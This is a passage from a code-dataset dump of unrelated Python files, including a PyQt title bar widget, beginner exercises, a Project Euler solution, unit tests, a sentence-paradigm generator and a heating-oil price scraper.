))\n","sub_path":"python_tdd/functional_tests/test_list_item_validation.py","file_name":"test_list_item_validation.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"558672392","text":"# convert farenheit to celsius\nfahrenheit = 75\ncelsius = (fahrenheit - 32) / 1.8\nprint(int(celsius))\n\n# convert miles to km & meters\nmiles = 5\nkm = miles / 0.62137\nmeters = 1000 * km\nprint(\"Miles: \" + str(miles))\nprint(\"Km: \" + str(round(km,4)))\nprint(\"Meters: \" + str(round(meters,4)))\n\na = \"gutten morgen\"[3:6]\nprint(a.upper())\n\na = \"racetrack\"[1:4]\nprint(a.capitalize())\n\n'some_string'.find(\"ing\")\n\na = \"python 4 ever&EVER\"\n\na.find(\"E\")\na.find(\"eve\")\na.rfind(\"rev\")\na.rfind(\"VER\")\na.find(\" \")\na.rfind(\" \")\n\n\"on\" in a\n\"\" in a\n\"2 * 2\" in a\n\na.count(\"ev\")\na.count(\" \")\na.count(\" 4 \")\na.count(\"eVer\")\n\na = \"Raining in the spring time.\"\n\na.replace(\"R\", \"r\")\na.replace(\"ing\", \"\")\na.replace(\"!\", \".\")\nb = a.replace(\"time\",\"tiempo\")\n\nprint(a)\n\n\"la\" + \"la\" + \"Land\"\n\n\"USA\" + \" vs \" + \"Canada\"\n\nb = \"NYc\"\nc = 5\nb * c\n\ncolor = \"red\"\nshape = \"circle\"\nnumber = 3\nnumber * (color + \"-\" + shape)\n\na = \"Eat Work Play Sleep repeat\"\na = a.replace(\" \",\"ing \")\nstart = a.find(\"Working\")\nend = a.find(\"Sleep\")-1\na = a[start:end]\nprint(a)\n","sub_path":"get-programming/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"99490606","text":"import sys\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5.QtGui import QCursor, QMouseEvent, QFont, QKeySequence, QSyntaxHighlighter, QTextCharFormat, QBrush, QTextCursor\nfrom PyQt5.QtCore import QPoint, pyqtSignal, QRegExp\nfrom PyQt5.QtCore import Qt, QPropertyAnimation, QRect, QEasingCurve\nfrom PyQt5.QtCore import QObject, QMimeData\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QLineEdit, QCompleter, QFileDialog, QGraphicsDropShadowEffect\nfrom PyQt5.QtWidgets import QHBoxLayout, QTextEdit, QPlainTextEdit, QShortcut\nfrom PyQt5.QtWidgets import QLabel, QStackedWidget, QMessageBox\nfrom PyQt5.QtWidgets import QPushButton, QDesktopWidget\nfrom PyQt5.QtWidgets import QVBoxLayout, QScrollBar\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtCore import Qt, QRect, QSize, QRectF\nfrom PyQt5.QtWidgets import QWidget, QPlainTextEdit, QTextEdit\nfrom PyQt5.QtGui import QColor, QPainter, QTextFormat, QLinearGradient\nimport textwrap\nfrom pynput import keyboard\nimport string\nimport os\nimport subprocess\nfrom pathlib import Path\nimport ctypes\nimport re\n# to get the working monitor size\nfrom win32api import GetMonitorInfo, MonitorFromPoint\n\nimport TitleBar, FirstWindow, config, AutoGrid\n\nclass MyBar(QWidget):\n def __init__(self, parent):\n super(MyBar, self).__init__()\n global titleBar\n btn_size = 35\n titleBar = self\n # make the main window the parent\n self.parent = parent\n # create the layout to store the titlebar and buttons horizontally\n self.layout = QHBoxLayout()\n # allow for 8 pixels at the right so we can resize right and top right\n # also 8 margin at the top so that the buttons don't get in the way of resizing\n # left, top, right, bottom\n # add left margin to account for 3 corner buttons so the title is centered\n self.layout.setContentsMargins(btn_size*3,0,0,0)\n 
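# NOTE (editorial addition, not in the original file): each corner button is\n        # btn_size+25 = 60 px wide, so a left margin of btn_size*3 = 105 px only\n        # approximately centers the title; 3*(btn_size+25) = 180 px would offset\n        # the three buttons exactly.\n        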
self.layout.setSpacing(0)\n self.title = QLabel(config.appName)\n self.title.setMouseTracking(True)\n\n self.btn_close = QPushButton(\"x\")\n self.btn_close.clicked.connect(self.btn_close_clicked)\n # make the corner buttons more rectangular in the horizontal way\n self.btn_close.setFixedSize(btn_size+25,btn_size)\n self.btn_close.setStyleSheet(\"\"\"\n QPushButton\n {\n background-color: #2E3440; \n border:none;\n color: #E5E9F0;\n font: 14pt \"Consolas\";\n }\n QPushButton::hover\n {\n background-color : #990000;\n }\n \"\"\")\n self.btn_close.setMouseTracking(True)\n\n self.btn_min = QPushButton(\"-\")\n self.btn_min.clicked.connect(self.btn_min_clicked)\n self.btn_min.setFixedSize(btn_size+25, btn_size)\n self.btn_min.setStyleSheet(\"\"\"\n QPushButton\n {\n background-color: #2E3440; \n border:none;\n color: #E5E9F0;\n font: 14pt \"Consolas\";\n }\n QPushButton::hover\n {\n background-color : #D8DEE9;\n color: #2E3440;\n }\n \"\"\")\n self.btn_min.setMouseTracking(True)\n self.btn_max = QPushButton(\"+\")\n self.btn_max.clicked.connect(self.btn_max_clicked)\n self.btn_max.setFixedSize(btn_size+25, btn_size)\n self.btn_max.setStyleSheet(\"\"\"\n QPushButton\n {\n background-color: #2E3440; \n border:none;\n color: #E5E9F0;\n font: 14pt \"Consolas\";\n }\n QPushButton::hover\n {\n background-color : #D8DEE9;\n color: #2E3440;\n }\n \"\"\")\n self.btn_max.setMouseTracking(True)\n # give the title bar a height\n self.title.setFixedHeight(btn_size)\n self.title.setAlignment(Qt.AlignCenter)\n self.layout.addWidget(self.title)\n self.layout.addWidget(self.btn_min)\n self.layout.addWidget(self.btn_max)\n self.layout.addWidget(self.btn_close)\n\n self.title.setStyleSheet(\"\"\"\n background-color: #2E3440;\n border:none;\n color: #8FBCBB;\n font: 14pt \"Consolas\";\n \"\"\")\n self.setLayout(self.layout)\n\n self.start = QPoint(0, 0)\n # flags for resizing or dragging window\n self.pressing = False\n self.movingPosition = False\n self.resizingWindow = False\n self.setMouseTracking(True)\n \n # variable to track right click\n self.rightpressing = False\n \n # close the main window when the close button in the menu bar is pressed\n def btn_close_clicked(self):\n self.parent.close()\n\n def btn_max_clicked(self):\n global isMaximized\n monitor = QDesktopWidget().screenGeometry(self.parent)\n \n # if it is clicked while we are currently maximized, then it means we need to revert to\n # lastPosition\n if config.isMaximized:\n #self.parent.move(monitor.left(), monitor.top())\n self.parent.showNormal()\n config.isMaximized = False\n config.mainWin.updateSize()\n # if it is not maximized\n else:\n # if the maximize button is pressed on the menubar, it should call the maximize function of\n # the parent window. 
It is a standard function, so it is not written in this code\n #self.parent.move(monitor.left(), monitor.top())\n self.parent.showMaximized()\n # toggle isMax so we know the state\n config.isMaximized = True\n config.mainWin.updateSize()\n\n def btn_min_clicked(self):\n # same with the show minimized\n self.parent.showMinimized()\n \n def mouseDoubleClickEvent(self, event):\n # only a left double click will max and restore\n if event.button() == 1:\n self.btn_max_clicked()\n \n def mousePressEvent(self, event):\n if event.button() == Qt.RightButton:\n self.rightpressing = True\n pos = event.pos()\n self.pressing = True\n if config.isMaximized == False:\n self.movingPosition = True\n self.start = self.mapToGlobal(event.pos())\n\n def mouseMoveEvent(self, event):\n pos = event.pos()\n # top left\n if pos.x() <= 3 and pos.y() <= 3:\n QApplication.setOverrideCursor(Qt.SizeFDiagCursor)\n \n else:\n QApplication.setOverrideCursor(Qt.ArrowCursor)\n if config.isMaximized == False:\n # moving the window\n if self.pressing and self.movingPosition:\n config.rightDown = False\n config.leftDown = False\n config.downDown = False\n config.upDown = False\n self.end = self.mapToGlobal(event.pos())\n self.movement = self.end-self.start\n self.parent.setGeometry(self.mapToGlobal(self.movement).x()-6,\n self.mapToGlobal(self.movement).y()-6,\n self.parent.width(),\n self.parent.height())\n self.start = self.end\n\n def mouseReleaseEvent(self, QMouseEvent):\n if QMouseEvent.button() == Qt.RightButton:\n self.rightpressing = False\n self.pressing = False\n self.movingPosition = False\n # get the global positionn\n globalpos = QCursor()\n # get the current working resolution to account for things like the taskbar\n monitor_info = GetMonitorInfo(MonitorFromPoint((0,0)))\n working_resolution = monitor_info.get(\"Work\")\n workingWidth = working_resolution[2]\n workingHeight = working_resolution[3]\n # determine if the taskbar is present by comparing the normal height to the working height\n isTaskbar = True\n difference = 100000\n for i in range(0, QDesktopWidget().screenCount()):\n if workingHeight == QDesktopWidget().screenGeometry(i).height():\n isTaskbar = False\n break\n # store the smallest difference to determine the correct difference due to the taskbar\n elif abs(QDesktopWidget().screenGeometry(i).height() - workingHeight) < difference:\n difference = QDesktopWidget().screenGeometry(i).height() - workingHeight\n\n # if the taskbar is present then use the working height\n if isTaskbar == True:\n workingWidth = QDesktopWidget().screenGeometry(self.parent).width()\n workingHeight = QDesktopWidget().screenGeometry(self.parent).height() - difference\n # if the taskbar is not present then just use the normal width and height\n else:\n workingWidth = QDesktopWidget().screenGeometry(self.parent).width()\n workingHeight = QDesktopWidget().screenGeometry(self.parent).height()\n \n leftLimit = workingWidth / 2\n rightLimit = workingWidth\n x = globalpos.pos().x()\n # if x is negative just reverse it\n if x < 0:\n x = workingWidth - abs(x)\n # if the mouse is in the left half then snap it left\n if x < leftLimit:\n self.parent.snapWin(\"left\")\n #self.parent.setGeometry(0, 0, workingWidth/2, workingHeight)\n #config.leftDown = True\n # otherwise snap it to the right\n else:\n self.parent.snapWin(\"right\")\n #self.parent.setGeometry(workingWidth / 2, 0, workingWidth/2, workingHeight) \n #config.rightDown = True\n else:\n self.pressing = False\n self.movingPosition = 
False","sub_path":"src/v4.0/TitleBar.py","file_name":"TitleBar.py","file_ext":"py","file_size_in_byte":9982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"636479766","text":"# Author: Yan Lu yfl5541@psu.edu\n# Collaborator: Spoorthi Dhulappanavar sxd5682@psu.edu\n# Collaborator: Nicole Giron nqg5259@psu.edu\n# Collaborator: Xiaolong Lin xxl5453@psu.edu\n# Section: 4\n# Breakout: 11\ndef sum_n(n):\n if n<=0 :\n return 0\n else :\n sum = n + sum_n(n-1)\n return sum\n\ndef print_n(s, n):\n if n == 0:\n return\n else: \n print(s)\n print_n(s,n-1)\n\ndef run():\n num = int(input(\"Enter an int: \"))\n print(f\"sum is {sum_n(num)}.\")\n stri = input(\"Enter a string: \")\n print_n(stri,num)\n\nif __name__ == \"__main__\":\n run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"314240351","text":"from timeit import timeit\n\n\"\"\"\nProject Euler - Problem # 2\n\nCopyright 2020 Rob Snyder , Ithaca, NY 14850\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nThis problem is similar to the last in that we are taking a list of\nnumbers and summing those that meet a certain requirement. In this case,\nwe are summing even numbers. The list is where the complexity comes in -\nwe are not generating a simple range of natural numbers, we need\nto generate a more complex sequence.\n\nThe sequence is the Fibonnaci sequence, which starts with the integers\n1 and 2, then generates each next number n by summing the two numbers\nprior. The sequence starts, therefore:\n\n1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...\n\nFor this, we'll have to substitute range() with our own generator \nfunction. We'll make the function generic so we can use it anytime\nwe need such a sequence.\n\nNote that our generator is quite restrictive in the amount of state that it\nsaves. There is no need to save every number that has been generated, only\nthe last two. We also seed the first two entries with 0 and 1, so that \nit will yield 1 and 2 at the beginning. 
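\n\nA quick usage sketch (an editorial addition, not part of the original file;\nthe expected values follow directly from the generator defined below):\n\n>>> list(fibonnaci(10))\n[1, 2, 3, 5, 8]\n>>> sum(n for n in fibonnaci(10) if n % 2 == 0)\n10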
\n\"\"\"\n\n\ndef fibonnaci(limit=None):\n \"\"\"\n Generates a fibonnaci sequence, up to an optional limit.\n\n :param limit: the limit, never to exceed.\n :returns: a generator that iteratively returns numbers in \n the Fibonnaci sequence.\n \"\"\"\n\n # Seed the list\n l = (0, 1)\n\n # Until we limit, or until forever\n while True:\n # Determine the next digit\n s = sum(l)\n\n # Update our list\n l = (l[1], s)\n\n # If we should keep returning new values, do so; if not, stop.\n if not limit or s <= limit:\n yield s\n else:\n break\n\n\ndef main():\n print(sum([n for n in fibonnaci(4000000) if n % 2 == 0]))\n\n\nif __name__ == '__main__':\n print(timeit(main, number=1))\n","sub_path":"Solutions-Python/problem_002.py","file_name":"problem_002.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"468525777","text":"import scraper\n\n# Initialize end variables (arrays) from the scraper.\nuserIDs = scraper.userIDs\nuserNames = scraper.userNames\nuserDonations = scraper.userDonations\nuserTrophies = scraper.userTrophies\n\n\n# Assign points to userID's based on trophies\ndef AssignTrophiesPoints(userIDs):\n userScoreFromTrophies = []\n for i in range(len(userIDs)):\n # Workaround for python's bad calculations\n score = (200 - (4 * i))\n score = score / 100\n userScoreFromTrophies.append(score)\n return userScoreFromTrophies\n\n\n# Calculate score for a specific position n\ndef AssignDonationsPointByUserN(userDonations, n):\n counter = 0\n score = userDonations[n]\n for i in range(len(userDonations)):\n if score != userDonations[i]:\n if int(score) < int(userDonations[i]):\n counter = counter + 1\n points = 400 - (8 * counter)\n points = points / 100\n return points\n\n\n# Assign points to userID's based on donations\ndef AssignDonationsPoints(userDonations):\n userScoreFromDonations = []\n for n in range(len(userDonations)):\n userScoreFromDonations.append(AssignDonationsPointByUserN(userDonations, n))\n return userScoreFromDonations\n\n\n# Prints stats based on pos n in userIDs\ndef printSpelerStatsByID(n, userIDs, userNames, userDonations, userTrophies, userScoreFromDonations,\n userScoreFromTrophies):\n print(\"Tag ID: \" + userIDs[n])\n print(\"Username: \" + userNames[n])\n print(\"Donaties: \" + userDonations[n])\n print(\"Trofeen: \" + userTrophies[n])\n print(\"Punten donaties: \" + str(userScoreFromDonations[n]))\n print(\"Punten trofeeen: \" + str(userScoreFromTrophies[n]))\n totaal = float(userScoreFromTrophies[n]) + float(userScoreFromDonations[n])\n print(\"Totaal: \" + str(float(totaal)))\n\n\nuserScoreFromDonations = AssignDonationsPoints(userDonations)\nuserScoreFromTrophies = AssignTrophiesPoints(userIDs)\n\nprintSpelerStatsByID(2, userIDs, userNames, userDonations, userTrophies, userScoreFromDonations, userScoreFromTrophies)\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"572516517","text":"# the menu of bill's taco shack is going to start changing rapidly\n# therefore the code associated with it needs to be refactored to accomodate a rapidly changing menu\n# also prices are going to start being changed on a daily basis, and because of that, we want to pass\n#prices when we initialize the customer object\n\n\nimport unittest\nfrom customer_refactored import CustomerRefactored\n\nclass TestCustomerRefactored(unittest.TestCase):\n\n\tdef 
test_init(self):\n\t\ttest_customer = CustomerRefactored(\"bill shelton\", 15, {\"taco\": 2,\"burrito\": 8, \"enchilladas\": 6})\n\n\t\tself.assertEqual(test_customer.cash_available, 15)\n\t\tself.assertEqual(test_customer.prices, {\"taco\": 2,\"burrito\": 8, \"enchilladas\": 6})\n\t\tself.assertEqual(test_customer.food, {})\n\n\tdef test_calculate_purchase_amount(self):\n\t\torder = {\n\t\t\t\"taco\": 5,\n\t\t\t\"burrito\": 3,\n\t\t\t\"enchilladas\": 2\n\t\t}\n\t\ttest_customer = CustomerRefactored(\"bill shelton\", 150, {\"taco\": 2,\"burrito\": 8, \"enchilladas\": 6})\n\t\tcost = test_customer.calculate_purchase_amount(order)\n\t\tself.assertEqual(cost, 46)\n\n\t# def test_purchase_food(self):\n\t# \torder = {\n\t# \t\t\"taco\": 5,\n\t# \t\t\"burrito\": 3,\n\t# \t\t\"enchilladas\": 2\n\t# \t}\n\t# \ttest_customer = CustomerRefactored(\"bill shelton\", 150, {\"taco\": 2,\"burrito\": 8, \"enchilladas\": 6})\n\t# \ttest_customer.purchase_food(order)\n\t# \tself.assertEqual(test_customer.cash_available, 104)\n\t# \tself.assertEqual(test_customer.food, order)\n\n\t# def test_eat_food(self):\n\t# \torder = {\n\t# \t\t\"taco\": 7,\n\t# \t\t\"burrito\": 4,\n\t# \t\t\"enchilladas\": 2\n\t# \t}\n\t# \ttest_customer = CustomerRefactored(\"bill shelton\", 150, {\"taco\": 2,\"burrito\": 8, \"enchilladas\": 6})\n\t# \ttest_customer.purchase_food(order)\n\t# \tfood_eaten = {\n\t# \t\t\"taco\": 2,\n\t# \t\t\"burrito\": 1,\n\t# \t\t\"enchilladas\": 1\n\t# \t}\n\t# \ttest_customer.eat_food(food_eaten)\n\t# \tself.assertEqual(test_customer.food, {\n\t# \t\t\t\"taco\": 5,\n\t# \t\t\t\"burrito\": 3,\n\t# \t\t\t\"enchilladas\": 1\n\t# \t\t})\t\t\n\n\nif __name__ == '__main__':\n\tunittest.main()","sub_path":"classes/customer_refactored_test.py","file_name":"customer_refactored_test.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"386304617","text":"#augment the vocabulary with the the word \"apparition\" before use.\nfrom utils import data_generator\nfrom utils.constituent_building import *\nfrom utils.conjugate import *\nfrom utils.randomize import choice\nimport random\nimport generation_projects.inductive_biases.person_helper\n\nclass MyGenerator(generation_projects.inductive_biases.person_helper.PersonGenerator):\n def __init__(self):\n super().__init__(uid=\"person_lexical_content_apparition\",\n linguistic_feature_type=\"morphological\",\n linguistic_feature_description=\"Is the pronoun 1st person?\",\n surface_feature_type=\"lexical content\",\n surface_feature_description=\"Is the word 'apparition' present?\",\n control_paradigm=False)\n\n self.safe_animate_common_nouns = np.setdiff1d(np.intersect1d(all_common_nouns, all_animate_nouns), get_all(\"expression\", \"apparition\"))\n self.target_lexicon = get_all(\"expression\", \"apparition\")[0]\n def sample(self):\n # Training 1/1\n # I think that John found the apparition.\n # first cp_verb_first THAT D1 NP1 verb_1 Dt APPARITION\n\n # Training 0/0\n # They think that John found the hairdresser.\n # non_first cp_verb_non_first THAT D1 NP1 verb_1 D2 NP2\n\n # Test 1/0\n # John thinks that the hairdresser found me.\n # D1 NP1 cp_verb_1 THAT D2 NP2 verb_2 first_acc\n\n # Test 0/1\n # John thinks that the apparition found them.\n # D1 NP1 cp_verb_1 THAT Dt APPARITION verb_t non_first_acc\n\n # Control 1/1\n # John thinks that the apparition found me.\n # D1 NP1 cp_verb_1 THAT Dt APPARITION verb_t first_acc\n\n # Control 0/0\n # John thinks that the 
hairdresser found them.\n # D1 NP1 cp_verb_1 THAT D2 NP2 verb_2 non_first_acc\n\n first, non_first, first_acc, non_first_acc = self.get_pronouns()\n NP1 = choice(np.setdiff1d(all_animate_nouns, get_all(\"expression\", \"apparition\")))\n NP2 = choice(self.safe_animate_common_nouns, avoid=NP1)\n D1 = choice(get_matched_by(NP1, \"arg_1\", self.dets))\n D2 = choice(get_matched_by(NP2, \"arg_1\", self.dets))\n Dt = choice(get_matched_by(self.target_lexicon, \"arg_1\", self.dets))\n cp_verb = choice(self.cp_verb)\n cp_verb_aux = return_aux(cp_verb, first)\n cp_verb_first = re_conjugate(cp_verb, first, cp_verb_aux)\n cp_verb_non_first = re_conjugate(cp_verb, non_first, cp_verb_aux)\n cp_verb_1 = re_conjugate(cp_verb, NP1, cp_verb_aux)\n verb = choice(self.trans_verb)\n verb_aux = return_aux(verb, NP1)\n verb_1 = re_conjugate(verb, NP1, verb_aux)\n verb_2 = re_conjugate(verb, NP2, verb_aux)\n # t for target_exicon\n verb_t = re_conjugate(verb, self.target_lexicon, verb_aux)\n\n track_sentence = [\n (first[0], cp_verb[0], NP1[0], verb[0]), #training 1/1\n (non_first[0], cp_verb[0], NP1[0], verb[0], NP2[0]), #training 0/0\n (NP1[0], cp_verb[0], NP2[0], verb[0], first_acc[0]), #Test 1/0\n (NP1[0], cp_verb[0], verb[0], non_first_acc[0]), #Test 0/1\n (NP1[0], cp_verb[0], verb[0], first_acc[0]), #Control 1/1\n (NP1[0], cp_verb[0], NP2[0], verb[0], non_first_acc[0]) #Control 0/0\n ]\n\n data = self.build_paradigm(\n training_1_1=\"%s %s that %s %s %s %s apparition\" % (first[0], cp_verb_first[0], D1[0], NP1[0], verb_1[0], Dt[0]),\n training_0_0=\"%s %s that %s %s %s %s %s\" % (non_first[0], cp_verb_non_first[0], D1[0], NP1[0], verb_1[0], D2[0], NP2[0]),\n test_1_0=\"%s %s %s that %s %s %s %s\" % (D1[0], NP1[0], cp_verb_1[0], D2[0], NP2[0], verb_2[0], first_acc[0]),\n test_0_1=\"%s %s %s that %s apparition %s %s\" % (D1[0], NP1[0], cp_verb_1[0], Dt[0], verb_t[0], non_first_acc[0]),\n control_1_1=\"%s %s %s that %s apparition %s %s\" % (D1[0], NP1[0], cp_verb_1[0], Dt[0], verb_t[0], first_acc[0]),\n control_0_0=\"%s %s %s that %s %s %s %s\" % (D1[0], NP1[0], cp_verb_1[0], D2[0], NP2[0], verb_2[0], non_first_acc[0])\n )\n return data, track_sentence\n\ngenerator = MyGenerator()\ngenerator.generate_paradigm(number_to_generate=5000, rel_output_path=\"outputs/inductive_biases/\" + generator.uid)\n","sub_path":"generation_projects/inductive_biases/person_lexical_content_apparition.py","file_name":"person_lexical_content_apparition.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"289323655","text":"#!/usr/bin/python\n\nimport urllib2, json, base64, time, datetime, sys\nfrom collections import OrderedDict\n\nconfig = json.loads( open(\"config.json\").read() )\nproject_id = config['project_id']\napi_key = config['api_key']\n\ndef get_data():\n\tsunday = datetime.date.today() - datetime.timedelta(days=datetime.date.today().weekday()+1)\n\n\tdates = dict()\n\n\tfor single_date in (sunday + datetime.timedelta(n) for n in range(7)):\n\t\tdates[time.mktime(single_date.timetuple())] = list()\n\n\tauthorization = \"%s:\" % api_key\n\trequest_headers = dict()\n\trequest_headers[\"Authorization\"] = \"Basic %s\" % base64.b64encode(authorization)\n\topener = urllib2.build_opener()\n\topener.addheaders = request_headers.items()\n\turl = \"https://app.asana.com/api/1.0/projects/%d/tasks?opt_fields=name,due_on\" % (project_id)\n\tdata = opener.open(url).read()\n\n\tfull_tasks = json.loads(data)\n\n\ttimed_tasks = [ t for t in 
full_tasks['data'] if t['due_on'] ]\n\n\tfiltered_tasks = list()\n\n\tfor task in timed_tasks:\n\t\tdue_on_timestamp = time.mktime(datetime.datetime.strptime(task['due_on'], \"%Y-%m-%d\").timetuple())\n\t\ttask['due_on_timestamp'] = due_on_timestamp\n\t\tif due_on_timestamp in dates.keys():\n\t\t\tdates[due_on_timestamp].append( task )\n\n\t# OrderedDict is already imported at module level\n\tdates = OrderedDict(sorted(dates.items(), key=lambda t: t[0]))\n\treturn dates\n","sub_path":"dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"525754716","text":"import pytest\nfrom ecommerce.inventory.models import Product\n\n\n@pytest.mark.parametrize(\n    \"id, name,\",\n    [\n        (1, \"widstar running sneakers\"),\n        (4000, \"korkease nain sandals wout box\"),\n        (8616, \"impact puse dance shoe\"),\n    ],\n)\ndef test_inventory_db_product_dataset(db, django_db_setup, id, name):\n\n    item = Product.objects.get(id=id)\n\n    assert item.name == name\n","sub_path":"ecommerce/inventory/tests/test_db_fixtures.py","file_name":"test_db_fixtures.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
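The parametrized test above maps cleanly onto a database-free version of the same table-driven pattern; a minimal sketch (invented catalog, not the ecommerce fixtures):

```python
import pytest

# Hypothetical in-memory stand-in for the Product table.
CATALOG = {1: "widstar running sneakers", 8616: "impact puse dance shoe"}

@pytest.mark.parametrize("pid, name", [
    (1, "widstar running sneakers"),
    (8616, "impact puse dance shoe"),
])
def test_catalog_names(pid, name):
    assert CATALOG[pid] == name
```

+{"seq_id":"628419766","text":"#Author: Robert O Driscoll\n#This program runs in an hourly cronjob on my AWS EC2 Linux machine\n#\n#!/usr/bin/env python\nimport os\nimport MySQLdb\nimport urllib # URL functions\nimport urllib2 # URL functions\nimport time\nimport datetime\nimport requests\nfrom bs4 import BeautifulSoup\n\n########################################################################################\n#Opens a database connection and reads from the daily reading table. The program reads the last\n#2 values from the epoch, volume and temperature columns and returns them. It uses the\n#datetime.datetime.fromtimestamp() function to return the formatted date and time from the\n#epoch. It subtracts the last 2 values in the volume column and returns the amount, to give the\n#user an idea of how much oil was used that day, and it returns the temperature from that time\n#as well. 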
\n#######################################################################################\ndatabase = MySQLdb.connect(host='#####',user='#####',passwd='######',db='######') \ncursor = database.cursor()\ncursor.execute (\"SELECT epoch,vol,temp FROM dailydata ORDER BY id DESC LIMIT 2\")\ndata = cursor.fetchall ()\ndailyrow = [item[0] for item in data]\ndailyrow2 = [item[1] for item in data]\ndailyrow3 = [item[2] for item in data]\ndailytemp = dailyrow3[0]\ndailyepoch = datetime.datetime.fromtimestamp(dailyrow[0]).strftime('%c') \ndailylevelVar = dailyrow2[0]\ndailydropVar = dailyrow2[1] - dailylevelVar\n\n\n###########################################################################################\n#This code block does the same as above; however, it reads from the weekly table to give the user\n#an idea of the statistics on a weekly basis\n###########################################################################################\ncursor.execute (\"SELECT epoch,vol,temp FROM weeklydata ORDER BY id DESC LIMIT 2\")\ndata = cursor.fetchall ()\nweeklyrow = [item[0] for item in data]\nweeklyrow2 = [item[1] for item in data]\nweeklyrow3 = [item[2] for item in data]\nweeklytemp = weeklyrow3[0]\nweeklyepoch = datetime.datetime.fromtimestamp(weeklyrow[0]).strftime('%c') \nweeklylevelVar = weeklyrow2[0]\nweeklydropVar = weeklyrow2[1] - weeklylevelVar\n\ndailyhours = (dailyrow[0]-dailyrow[1])/3600\nweeklyhours = (weeklyrow[0]-weeklyrow[1])/3600\n\n\n##########################################################################################\n#Here we read in two separate webpages and parse out the content we need by locating the necessary\n#tags.\n##########################################################################################\nurl1 = \"http://www.cheapestoil.ie/distributors/Mor-Oil?l=7\"\nurl2 = \"http://www.cheapestoil.ie/distributors/MacMahon-Oil?l=7\"\n#url3 = \"http://www.cheapestoil.ie/heating-ces/Galway\"\nr1 = requests.get(url1)\nr2 = requests.get(url2)\n#r3 = requests.get(url3)\nsoup1 = BeautifulSoup(r1.content,\"lxml\")\nsoup2 = BeautifulSoup(r2.content,\"lxml\")\n#soup3 = BeautifulSoup(r3.content,\"lxml\")\n\nlinks1 = soup1.find_all(\"a\")\nlinks2 = soup2.find_all(\"a\")\n#links3 = soup3.find_all(\"a\")\n\noilInfo1 = soup1.find_all(\"div\", {\"id\": \"ctl00_ctl00_ContentPlaceHolder1_Distributorbody_pnlWorking\"})\noilInfo2 = soup2.find_all(\"div\", {\"id\": \"ctl00_ctl00_ContentPlaceHolder1_Distributorbody_pnlWorking\"})\n#oilInfo3 = soup3.find_all(\"span\", {\"class\": \"CellPrice\"})\n\n###################################################################################################\n#Then we use for loops to read through the text and save it to strings. As there were some special\n#characters from the Irish letters in the oil companies' names, I attempted to strip them out using\n#the .encode('ascii', 'ignore').decode('ascii') calls. I also created 2 other strings and loaded them with\n#the values taken from the database results above. 
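Before the loops that follow, the extraction pattern is easier to see in isolation. A self-contained sketch against an inline snippet — the real pages, the `lxml` parser, and the ASP.NET element id above are site-specific, so this uses the stdlib `html.parser` and an invented id:

```python
from bs4 import BeautifulSoup

html = '<div id="pnlWorking">900 litres \u20ac585.00</div>'
soup = BeautifulSoup(html, "html.parser")
text = soup.find("div", {"id": "pnlWorking"}).text
# Drop non-ASCII characters (here the euro sign), as the script below does.
clean = text.encode("ascii", "ignore").decode("ascii")
assert clean == "900 litres 585.00"
```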
\n###################################################################################################\nfor item1 in oilInfo1:\n textString1 = item1.text\n\nfor item2 in oilInfo2:\n textString2 = item2.text\n\n\nnewString1 = textString1.encode('ascii', 'ignore').decode('ascii')\nnewString2 = textString2.encode('ascii', 'ignore').decode('ascii')\nnewString3 = \"%.2f Litres, %d Degrees, As of %s,dailyhours,%d\" % (dailydropVar,dailytemp,dailyepoch,dailyhours)\nnewString4 = \"%.2f Litres, %d Degrees, As of %s,weeklyhours,%d\" % (weeklydropVar,weeklytemp,weeklyepoch,weeklyhours)\n\n################################################################################################\n#I then opened a couple of text files and wrote the values to them an closed them.\n##################################################################################################\ntext_file1 = open(\"MorOil.txt\", \"w\")\ntext_file1.write(newString1)\ntext_file2 = open(\"MacMahon.txt\", \"w\")\ntext_file2.write(newString2)\ntext_file3 = open(\"dailyusage.txt\", \"w\")\ntext_file3.write(newString3)\ntext_file4 = open(\"weeklyusage.txt\", \"w\")\ntext_file4.write(newString4)\ntext_file1.close()\ntext_file2.close()\ntext_file3.close()\ntext_file4.close()\n\n","sub_path":"PythonScript/projectScripts/awsScripts/webScraper.py","file_name":"webScraper.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"95470816","text":"choice = int(input(\"1.Sort by Cost (L-H)\\n\"\r\n \"2.Sort by Cost (H-L)\\n\"\r\n \"3.Sort by Rating\\n\"\r\n \"4.Sort by Discount (L-H)\\n\"\r\n \"5.Sort by Discount 